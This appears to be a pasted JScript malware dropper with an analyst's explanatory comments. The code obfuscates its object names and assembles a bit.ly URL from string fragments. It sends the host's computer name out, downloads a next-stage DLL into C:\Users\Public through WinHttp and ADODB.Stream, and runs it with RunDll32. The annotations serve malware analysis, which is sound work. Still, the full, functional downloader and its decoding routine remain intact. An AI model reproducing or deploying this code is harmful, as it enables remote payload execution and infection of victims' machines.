Untitled

// JavaScript Document			- this was the original comment. I think it's JScript, actually
/* global WScript, exit, eof */

var sID;
var sIDW;
var xID = 91;
var cID = "LIKINHYICFWIRGD";
var cWN3t = "FHIHEHUIKIBIIIMFRGYHWIMIPIHIKID";
var sNomeMaq;
var cFolder = "C:\\Users\\Public\\";
var cScrF1l3 = "CHBHRIHHXIFIJHXIDHVFOGNHXIBHTHBIOIIIJHTICGWHQHYHTHRIJ";
var c1nf3ctz = "";
var sTipoSO;
var sAwvx = "NHYBVGTVFGTDCE";
var cHosttotal;
var NAMEWG141 = "xcty.dll";
var NAMENP413 = "xcty.dll";
var cHost287 = "ht";															// the cHost variables are strung together to form a URL:
var cHost771 = "tp";															//  http://bit.ly/2KOVf8Z
var cHost983 = ":/";
var cHost300 = "/b";
var cHost529 = "it";
var cHost840 = ".l";
var cHost694 = "y/";
var cHost448 = "2K";
var cHost158 = "OV";
var cHost280 = "f8";
var cHost360 = "Z";

//Determine the filename to use - note this script is assuming that IE is the browser because FF and Chrome don't support ActiveXObject and will throw an error
var network = new ActiveXObject(wdecrypt1064(cWN3t,xID));   					// decryption leads to WScript.Network
sNomeMaq = network.computerName;        										// uses WScript.Network object to get the local computer name
cFolder = cFolder + sNomeMaq.substring(0, 3) + "OLNM822\\"; 					// C:\Users\Public\ABCOLNM822\ where "ABC" are the 1st three letters of the PC Name
sId = cFolder + "id";         													// C:\Users\Public\ABCOLNM822\id where "ABC" are the 1st three letters of the PC Name
sIdW = cFolder + "idw";       													// C:\Users\Public\ABCOLNM822\idw where "ABC" are the 1st three letters of the PC Name
cHosttotal = cHost287+cHost771+cHost983+cHost300+cHost529+cHost840+cHost694+cHost448+cHost158+cHost280+cHost360; 	// the cHost variables are strung together to form http://bit.ly/2KOVf8Z
c1nf3ctz = c1nf3ctz +"?tmpString=" + cHosttotal + "&pcn=" + network.computerName+ "&AT=" + 0905; 					// Decodes to ?tmpString=http://bit.ly/2KOVf8Z&pcn=ComputerName&AT=905

//Filename & system checks. Try to download malware and save it to disk
var fso = WScript.CreateObject(wdecrypt1064(cScrF1l3,xID)); 					// Decodes to: Scripting.FileSystemObject
	if (!fso.FileExists(sId) && fso.FolderExists("C:\\Users\\Public\\"))		// If the file exists but the folder does not
	{
	 try{
		down3546(c1nf3ctz)														// Try to download the next stage
		}
	 catch(err) {}

	if (!fso.FolderExists(cFolder)) 											// If the folder does not exist
	{
	fso.CreateFolder(cFolder);													// then create it
			}

	if (fso.FolderExists("C:\\Program Files (x86)\\")) 							// Check to deduce whether 32-bit or 64-bit system
	{
		sTipoSO = "64";
	}
	else
	{
		sTipoSO = "32";
	}

	var s = fso.CreateTextFile(sId, true);										//
		s.WriteLine(wdecrypt1064(cID,xID));                                     // Decrypts to:  load-s3
		s.Close();
	var s2 = fso.CreateTextFile(sIdW, true);                                    // Creates C:\Users\Public\ABCOLNM822\idw and...
		s2.WriteLine("91");														// writes "91" to it
		s2.Close();
	 try
	 {
		down3546(cHosttotal)													// Try to download the next stage
		}
	catch(err) 	{}

down3546(cHosttotal, "C:\\Users\\Public\\"+ NAMENP413);  						// Calls the download function with arguments: URL and filename (c:\\Users\Public\\xcty.dll)
	try
	{
		run1176("RunDll32.exe C:\\Users\\Public\\"+ NAMEWG141 + ",thnde");		// Calls the run function with arguments Rundll32.exe + Filename + ",thnde"
	}
	catch(err) {}
	}

function wdecrypt1064(s1, id)     												// This function decrypts a path based on the computer name to use for storing the file to be downloaded
{
var sx;
var x;
var x4;
var sr;
var wx1;
var wx2;
var wxgx1;
   wxgx1 = 65;
	sr = "";
	sx = "";
	x = 0;
	x4 = s1.charCodeAt(0) - wxgx1;   											// which is 70 - 65 = 5
	s1 = s1.substring(1);            											// which is the variable passed into the function starting at position 1 or HIHEHUIKIBIIIMFRGYHWIMIPIHIKID
		while (s1.length > 0){       											// s1.length starts as 30
		wx1 = (s1.charCodeAt(0)-wxgx1);     									// This equals 7 on the first run
		wx2 = (s1.charCodeAt(1)-wxgx1);     									// This equals 8 on the first run
        sr = sr + String.fromCharCode( wx1 * 25 + wx2  - x4 - id);     			// This ends up making sr= Wscript.Network
		s1 = s1.substring(2);       	    									// s1 now equals I and it's used in the loop
		}
		return sr;       														// returns: WScript.Network
}

function down3546(url, file) {													// This function visits the link at http://bit.ly/2KOVf8Z and then ......
var data;
var ado;

        try
        {
            var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");	// creates the WinHttpRequest object

            // ResolveTimeout, ConnectTimeout, SendTimeout, ReceiveTimeout
            WinHttpReq.SetTimeouts(30000, 30000, 30000, 5000);

            void(WinHttpReq.Open("GET", url, false));							// Calls the Open method
            WinHttpReq.Send();													// Assemble the request headers and sends the request
            if (WinHttpReq.Status == 404)										// If 404 is the status then return "false"
            {
                return false;
            }
            data = WinHttpReq.ResponseBody;										// Retrieves the response entity body as an array of unsigned bytes. Saves it in variable "data"
        }
        catch (ex)
        {
            //WScript.Echo("Error downloading file: " + ex.message);
            return false;
        }

        ado = new ActiveXObject("ADODB.Stream");
        ado.Type = 1; 															// binary mode
        ado.Open();
        ado.Write(data);														// Writes the contents of the "data" variable to disk
        ado.SaveToFile(file, 2); 												// 2 = overwrite existing file
        ado.Close();

        return true;
    }

function run1176(file) { 														// This function attempts to use WScript.Shell to run the file that was downloaded
var ws = new ActiveXObject("WScript.Shell");
ws.Exec(file);
}